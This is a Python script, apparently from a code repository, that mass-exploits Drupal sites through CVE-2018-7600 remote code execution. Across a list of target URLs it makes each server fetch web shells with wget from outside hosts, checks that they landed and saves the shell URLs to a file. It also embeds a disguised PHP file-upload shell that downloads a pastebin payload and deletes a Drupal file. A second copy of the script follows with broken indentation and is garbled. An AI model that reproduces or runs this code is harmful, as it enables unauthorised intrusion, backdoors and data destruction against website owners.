kuldeep1337/izocin.py

## izocin.py
#!/usr/bin/python

# Coded By izocin
# Turkey

import requests, re, urllib2, os, sys, codecs,binascii, json
from multiprocessing.dummy import Pool
from time import time as timer
import time
from random import sample as rand
from Queue import Queue
from platform import system
from colorama import Fore
from colorama import Style
from pprint import pprint
from colorama import init
init(autoreset=True)


####### Colors	 ######

fr  =   Fore.RED
fc  =   Fore.CYAN
fw  =   Fore.WHITE
fg  =   Fore.GREEN
sd  =   Style.DIM
sn  =   Style.NORMAL
sb  =   Style.BRIGHT

#######################
try:
    with codecs.open(sys.argv[1], mode='r', encoding='ascii', errors='ignore') as f:
        ooo = f.read().splitlines()
except IOError:
    pass
ooo = list((ooo))


def banners():


	if system() == 'Linux':
		os.system('clear')
	if system() == 'Windows':
		os.system('cls')

		banner = """{}{} \n \n


  ,--,                                      ,--,
,--.'|          ,----,   ,---.            ,--.'|         ,---,
|  |,         .'   .`|  '   ,'\           |  |,      ,-+-. /  |
`--'_      .'   .'  .' /   /   |   ,---.  `--'_     ,--.'|'   |
,' ,'|   ,---, '   ./ .   ; ,. :  /     \ ,' ,'|   |   |  ,"' |
'  | |   ;   | .'  /  '   | |: : /    / ' '  | |   |   | /  | |
|  | :   `---' /  ;--,'   | .; :.    ' /  |  | :   |   | |  | |
'  : |__   /  /  / .`||   :    |'   ; :__ '  : |__ |   | |  |/
|  | '.'|./__;     .'  \   \  / '   | '.'||  | '.'||   | |--'
;  :    ;;   |  .'      `----'  |   :    :;  :    ;|   |/
|  ,   / `---'                   \   \  / |  ,   / '---'
 ---`-'                           `----'   ---`-'


	Coded By: izocin , FB.com/izo.cin.73


		\n""".format(fc, sb)

		print banner

shell = """GIF89a <?php echo 'nobita'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd(); Echo '<center>  <form method="post" target="_self" enctype="multipart/form-data">  <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" />  </form>  </center></td></tr> </table><br>'; if (!empty ($_FILES['uploads'])) {     move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);     Echo "<script>alert('upload Done'); 	 	 </script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type']; } ?>

<?php


$index = exec('wget -O index.php "https://pastebin.com/raw/mbufQDHY"');
unlink('modules/user/user.pages.inc');

echo $index;
?>"""


def sitebul(url):


    try:


		# 22 . rev


		get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]':'wget https://raw.githubusercontent.com/worldexploit/tr/master/izom.php', 'name[#type]':'markup'}
		post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
		r = requests.post(url, data=post_params, params=get_params)


		m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
		if m:
		    found = m.group(1)

		get_params = {'q':'file/ajax/name/#value/' + found}
		post_params = {'form_build_id':found}
		r = requests.post(url, data=post_params, params=get_params)

		lib = requests.get(url+'/izom.php')


		if re.findall("izocin", lib.content):
			print '[{}Drupal]: {} {}	       ====> {}{} CVE-2018-7600 RCE V7     {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
			open('Shells.txt', 'a').write(url+'/izom.php'+'\n')
			sys.exit()


		payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'}
		headers = {'User-Agent': 'Mozilla 5.0'}
		r = requests.post(url+ '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, verify=False, headers=headers)
		if 'Select Your File :' in requests.get(url+'/payload.php', headers=headers).text:
			print '[{}Drupal]: {} {}	       ====> {}{} CVE-2018-7600 RCE V8    {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
			open('Shells.txt', 'a').write(url+'/payload.php'+'\n')
			sys.exit()
		else:
			print '[{}Drupal]: {} {}	       ====> {}{} CVE-2018-7600 RCE     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)


    except:
        pass


banners()


def Main():
    try:

        start = timer()
        ThreadPool = Pool(70)
        Threads = ThreadPool.map(sitebul, ooo)
        print('Time: ' + str(timer() - start) + ' seconds')
    except:
        pass


if __name__ == '__main__':
    Main()
	#!/usr/bin/python

	# Coded By izocin
	# Turkey

	import requests, re, urllib2, os, sys, codecs,binascii, json
	from multiprocessing.dummy import Pool
	from time import time as timer
	import time
	from random import sample as rand
	from Queue import Queue
	from platform import system
	from colorama import Fore
	from colorama import Style
	from pprint import pprint
	from colorama import init
	init(autoreset=True)


	####### Colors ######

	fr = Fore.RED
	fc = Fore.CYAN
	fw = Fore.WHITE
	fg = Fore.GREEN
	sd = Style.DIM
	sn = Style.NORMAL
	sb = Style.BRIGHT

	#######################
	try:
	with codecs.open(sys.argv[1], mode='r', encoding='ascii', errors='ignore') as f:
	ooo = f.read().splitlines()
	except IOError:
	pass
	ooo = list((ooo))



	def banners():


	if system() == 'Linux':
	os.system('clear')
	if system() == 'Windows':
	os.system('cls')

	banner = """{}{} \n \n







	,--, ,--,
	,--.'\| ,----, ,---. ,--.'\| ,---,
	\| \|, .' .`\| ' ,'\ \| \|, ,-+-. / \|
	`--'_ .' .' .' / / \| ,---. `--'_ ,--.'\|' \|
	,' ,'\| ,---, ' ./ . ; ,. : / \ ,' ,'\| \| \| ,"' \|
	' \| \| ; \| .' / ' \| \|: : / / ' ' \| \| \| \| / \| \|
	\| \| : `---' / ;--,' \| .; :. ' / \| \| : \| \| \| \| \|
	' : \|__ / / / .`\|\| : \|' ; :__ ' : \|__ \| \| \| \|/
	\| \| '.'\|./__; .' \ \ / ' \| '.'\|\| \| '.'\|\| \| \|--'
	; : ;; \| .' `----' \| : :; : ;\| \|/
	\| , / `---' \ \ / \| , / '---'
	---`-' `----' ---`-'




	Coded By: izocin , FB.com/izo.cin.73




	\n""".format(fc, sb)

	print banner

	shell = """GIF89a <?php echo 'nobita'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd(); Echo '<center> <form method="post" target="_self" enctype="multipart/form-data"> <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" /> </form> </center></td></tr> </table><br>'; if (!empty ($_FILES['uploads'])) { move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']); Echo "<script>alert('upload Done'); </script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type']; } ?>

	<?php


	$index = exec('wget -O index.php "https://pastebin.com/raw/mbufQDHY"');
	unlink('modules/user/user.pages.inc');

	echo $index;
	?>"""






	def sitebul(url):


	try:


	# 22 . rev


	get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]':'wget https://raw.githubusercontent.com/worldexploit/tr/master/izom.php', 'name[#type]':'markup'}
	post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
	r = requests.post(url, data=post_params, params=get_params)


	m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
	if m:
	found = m.group(1)

	get_params = {'q':'file/ajax/name/#value/' + found}
	post_params = {'form_build_id':found}
	r = requests.post(url, data=post_params, params=get_params)

	lib = requests.get(url+'/izom.php')


	if re.findall("izocin", lib.content):
	print '[{}Drupal]: {} {} ====> {}{} CVE-2018-7600 RCE V7 {}{} Success upload '.format(sb, sd, url, fc,fc, sb,fg)
	open('Shells.txt', 'a').write(url+'/izom.php'+'\n')
	sys.exit()


	payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'}
	headers = {'User-Agent': 'Mozilla 5.0'}
	r = requests.post(url+ '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, verify=False, headers=headers)
	if 'Select Your File :' in requests.get(url+'/payload.php', headers=headers).text:
	print '[{}Drupal]: {} {} ====> {}{} CVE-2018-7600 RCE V8 {}{} Success upload '.format(sb, sd, url, fc,fc, sb,fg)
	open('Shells.txt', 'a').write(url+'/payload.php'+'\n')
	sys.exit()
	else:
	print '[{}Drupal]: {} {} ====> {}{} CVE-2018-7600 RCE {}{} Failed '.format(sb, sd, url, fc,fc, sb,fr)



	except:
	pass




	banners()


	def Main():
	try:

	start = timer()
	ThreadPool = Pool(70)
	Threads = ThreadPool.map(sitebul, ooo)
	print('Time: ' + str(timer() - start) + ' seconds')
	except:
	pass


	if __name__ == '__main__':
	Main()